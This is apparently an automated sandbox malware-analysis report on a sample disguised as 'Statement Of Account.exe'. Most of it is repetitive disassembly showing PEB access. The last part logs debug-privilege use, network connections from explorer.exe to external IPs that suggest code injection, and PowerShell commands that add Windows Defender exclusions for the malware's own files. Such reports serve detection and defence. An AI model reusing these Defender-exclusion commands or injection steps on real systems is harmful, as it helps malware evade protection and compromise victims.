Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h] 8_2_00F80770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h] 8_2_00F80770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h] 8_2_00F80770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h] 8_2_00F80770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h] 8_2_00F80770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h] 8_2_00F80770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h] 8_2_00F80770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h] 8_2_00F80770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFE75D mov eax, dword ptr fs:[00000030h] 8_2_00FFE75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F70750 mov eax, dword ptr fs:[00000030h] 8_2_00F70750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF4755 mov eax, dword ptr fs:[00000030h] 8_2_00FF4755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2750 mov eax, dword ptr fs:[00000030h] 8_2_00FB2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2750 mov eax, dword ptr fs:[00000030h] 8_2_00FB2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A740 mov eax, dword ptr fs:[00000030h] 8_2_00F6A740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA674D mov esi, dword ptr fs:[00000030h] 8_2_00FA674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA674D mov eax, dword ptr fs:[00000030h] 8_2_00FA674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA674D mov eax, dword ptr fs:[00000030h] 8_2_00FA674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA273C mov eax, dword ptr fs:[00000030h] 8_2_00FA273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA273C mov ecx, dword ptr fs:[00000030h] 8_2_00FA273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA273C mov eax, dword ptr fs:[00000030h] 8_2_00FA273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEC730 mov eax, dword ptr fs:[00000030h] 8_2_00FEC730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC720 mov eax, dword ptr fs:[00000030h] 8_2_00FAC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC720 mov eax, dword ptr fs:[00000030h] 8_2_00FAC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F70710 mov eax, dword ptr fs:[00000030h] 8_2_00F70710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA0710 mov eax, dword ptr fs:[00000030h] 8_2_00FA0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC700 mov eax, dword ptr fs:[00000030h] 8_2_00FAC700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC8F9 mov eax, dword ptr fs:[00000030h] 8_2_00FAC8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC8F9 mov eax, dword ptr fs:[00000030h] 8_2_00FAC8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0100892B mov eax, dword ptr fs:[00000030h] 8_2_0100892B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E8C0 mov eax, dword ptr fs:[00000030h] 8_2_00F9E8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044940 mov eax, dword ptr fs:[00000030h] 8_2_01044940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFC89D mov eax, dword ptr fs:[00000030h] 8_2_00FFC89D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F70887 mov eax, dword ptr fs:[00000030h] 8_2_00F70887
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01014978 mov eax, dword ptr fs:[00000030h] 8_2_01014978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01014978 mov eax, dword ptr fs:[00000030h] 8_2_01014978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFE872 mov eax, dword ptr fs:[00000030h] 8_2_00FFE872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFE872 mov eax, dword ptr fs:[00000030h] 8_2_00FFE872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F74859 mov eax, dword ptr fs:[00000030h] 8_2_00F74859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F74859 mov eax, dword ptr fs:[00000030h] 8_2_00F74859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA0854 mov eax, dword ptr fs:[00000030h] 8_2_00FA0854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F82840 mov ecx, dword ptr fs:[00000030h] 8_2_00F82840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010069C0 mov eax, dword ptr fs:[00000030h] 8_2_010069C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA830 mov eax, dword ptr fs:[00000030h] 8_2_00FAA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F92835 mov eax, dword ptr fs:[00000030h] 8_2_00F92835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F92835 mov eax, dword ptr fs:[00000030h] 8_2_00F92835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F92835 mov eax, dword ptr fs:[00000030h] 8_2_00F92835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F92835 mov ecx, dword ptr fs:[00000030h] 8_2_00F92835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F92835 mov eax, dword ptr fs:[00000030h] 8_2_00F92835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F92835 mov eax, dword ptr fs:[00000030h] 8_2_00F92835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103A9D3 mov eax, dword ptr fs:[00000030h] 8_2_0103A9D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFC810 mov eax, dword ptr fs:[00000030h] 8_2_00FFC810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA29F9 mov eax, dword ptr fs:[00000030h] 8_2_00FA29F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA29F9 mov eax, dword ptr fs:[00000030h] 8_2_00FA29F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFE9E0 mov eax, dword ptr fs:[00000030h] 8_2_00FFE9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A9D0 mov eax, dword ptr fs:[00000030h] 8_2_00F7A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A9D0 mov eax, dword ptr fs:[00000030h] 8_2_00F7A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A9D0 mov eax, dword ptr fs:[00000030h] 8_2_00F7A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A9D0 mov eax, dword ptr fs:[00000030h] 8_2_00F7A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A9D0 mov eax, dword ptr fs:[00000030h] 8_2_00F7A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A9D0 mov eax, dword ptr fs:[00000030h] 8_2_00F7A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA49D0 mov eax, dword ptr fs:[00000030h] 8_2_00FA49D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101483A mov eax, dword ptr fs:[00000030h] 8_2_0101483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101483A mov eax, dword ptr fs:[00000030h] 8_2_0101483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF89B3 mov esi, dword ptr fs:[00000030h] 8_2_00FF89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF89B3 mov eax, dword ptr fs:[00000030h] 8_2_00FF89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF89B3 mov eax, dword ptr fs:[00000030h] 8_2_00FF89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F709AD mov eax, dword ptr fs:[00000030h] 8_2_00F709AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F709AD mov eax, dword ptr fs:[00000030h] 8_2_00F709AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01006870 mov eax, dword ptr fs:[00000030h] 8_2_01006870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01006870 mov eax, dword ptr fs:[00000030h] 8_2_01006870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFC97C mov eax, dword ptr fs:[00000030h] 8_2_00FFC97C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB096E mov eax, dword ptr fs:[00000030h] 8_2_00FB096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB096E mov edx, dword ptr fs:[00000030h] 8_2_00FB096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB096E mov eax, dword ptr fs:[00000030h] 8_2_00FB096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F96962 mov eax, dword ptr fs:[00000030h] 8_2_00F96962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F96962 mov eax, dword ptr fs:[00000030h] 8_2_00F96962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F96962 mov eax, dword ptr fs:[00000030h] 8_2_00F96962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF0946 mov eax, dword ptr fs:[00000030h] 8_2_00FF0946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010408C0 mov eax, dword ptr fs:[00000030h] 8_2_010408C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF892A mov eax, dword ptr fs:[00000030h] 8_2_00FF892A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103A8E4 mov eax, dword ptr fs:[00000030h] 8_2_0103A8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFC912 mov eax, dword ptr fs:[00000030h] 8_2_00FFC912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F68918 mov eax, dword ptr fs:[00000030h] 8_2_00F68918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F68918 mov eax, dword ptr fs:[00000030h] 8_2_00F68918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE908 mov eax, dword ptr fs:[00000030h] 8_2_00FEE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE908 mov eax, dword ptr fs:[00000030h] 8_2_00FEE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044B00 mov eax, dword ptr fs:[00000030h] 8_2_01044B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAAAEE mov eax, dword ptr fs:[00000030h] 8_2_00FAAAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAAAEE mov eax, dword ptr fs:[00000030h] 8_2_00FAAAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F70AD0 mov eax, dword ptr fs:[00000030h] 8_2_00F70AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA4AD0 mov eax, dword ptr fs:[00000030h] 8_2_00FA4AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA4AD0 mov eax, dword ptr fs:[00000030h] 8_2_00FA4AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01038B28 mov eax, dword ptr fs:[00000030h] 8_2_01038B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01038B28 mov eax, dword ptr fs:[00000030h] 8_2_01038B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FC6ACC mov eax, dword ptr fs:[00000030h] 8_2_00FC6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FC6ACC mov eax, dword ptr fs:[00000030h] 8_2_00FC6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FC6ACC mov eax, dword ptr fs:[00000030h] 8_2_00FC6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01006B40 mov eax, dword ptr fs:[00000030h] 8_2_01006B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01006B40 mov eax, dword ptr fs:[00000030h] 8_2_01006B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103AB40 mov eax, dword ptr fs:[00000030h] 8_2_0103AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01018B42 mov eax, dword ptr fs:[00000030h] 8_2_01018B42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01024B4B mov eax, dword ptr fs:[00000030h] 8_2_01024B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01024B4B mov eax, dword ptr fs:[00000030h] 8_2_01024B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101EB50 mov eax, dword ptr fs:[00000030h] 8_2_0101EB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01042B57 mov eax, dword ptr fs:[00000030h] 8_2_01042B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01042B57 mov eax, dword ptr fs:[00000030h] 8_2_01042B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01042B57 mov eax, dword ptr fs:[00000030h] 8_2_01042B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01042B57 mov eax, dword ptr fs:[00000030h] 8_2_01042B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F78AA0 mov eax, dword ptr fs:[00000030h] 8_2_00F78AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F78AA0 mov eax, dword ptr fs:[00000030h] 8_2_00F78AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FC6AA4 mov eax, dword ptr fs:[00000030h] 8_2_00FC6AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA8A90 mov edx, dword ptr fs:[00000030h] 8_2_00FA8A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F6EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F6EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FECA72 mov eax, dword ptr fs:[00000030h] 8_2_00FECA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FECA72 mov eax, dword ptr fs:[00000030h] 8_2_00FECA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FACA6F mov eax, dword ptr fs:[00000030h] 8_2_00FACA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FACA6F mov eax, dword ptr fs:[00000030h] 8_2_00FACA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FACA6F mov eax, dword ptr fs:[00000030h] 8_2_00FACA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80A5B mov eax, dword ptr fs:[00000030h] 8_2_00F80A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80A5B mov eax, dword ptr fs:[00000030h] 8_2_00F80A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h] 8_2_00F76A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h] 8_2_00F76A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h] 8_2_00F76A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h] 8_2_00F76A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h] 8_2_00F76A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h] 8_2_00F76A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h] 8_2_00F76A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01024BB0 mov eax, dword ptr fs:[00000030h] 8_2_01024BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01024BB0 mov eax, dword ptr fs:[00000030h] 8_2_01024BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F94A35 mov eax, dword ptr fs:[00000030h] 8_2_00F94A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F94A35 mov eax, dword ptr fs:[00000030h] 8_2_00F94A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101EBD0 mov eax, dword ptr fs:[00000030h] 8_2_0101EBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9EA2E mov eax, dword ptr fs:[00000030h] 8_2_00F9EA2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FACA24 mov eax, dword ptr fs:[00000030h] 8_2_00FACA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFCA11 mov eax, dword ptr fs:[00000030h] 8_2_00FFCA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F68A00 mov eax, dword ptr fs:[00000030h] 8_2_00F68A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F68A00 mov eax, dword ptr fs:[00000030h] 8_2_00F68A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9EBFC mov eax, dword ptr fs:[00000030h] 8_2_00F9EBFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F78BF0 mov eax, dword ptr fs:[00000030h] 8_2_00F78BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F78BF0 mov eax, dword ptr fs:[00000030h] 8_2_00F78BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F78BF0 mov eax, dword ptr fs:[00000030h] 8_2_00F78BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFCBF0 mov eax, dword ptr fs:[00000030h] 8_2_00FFCBF0
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.94 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.12.38.29 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.149.87.45 80 Jump to behavior
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SdYCcXyq.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SdYCcXyq.exe" Jump to behavior
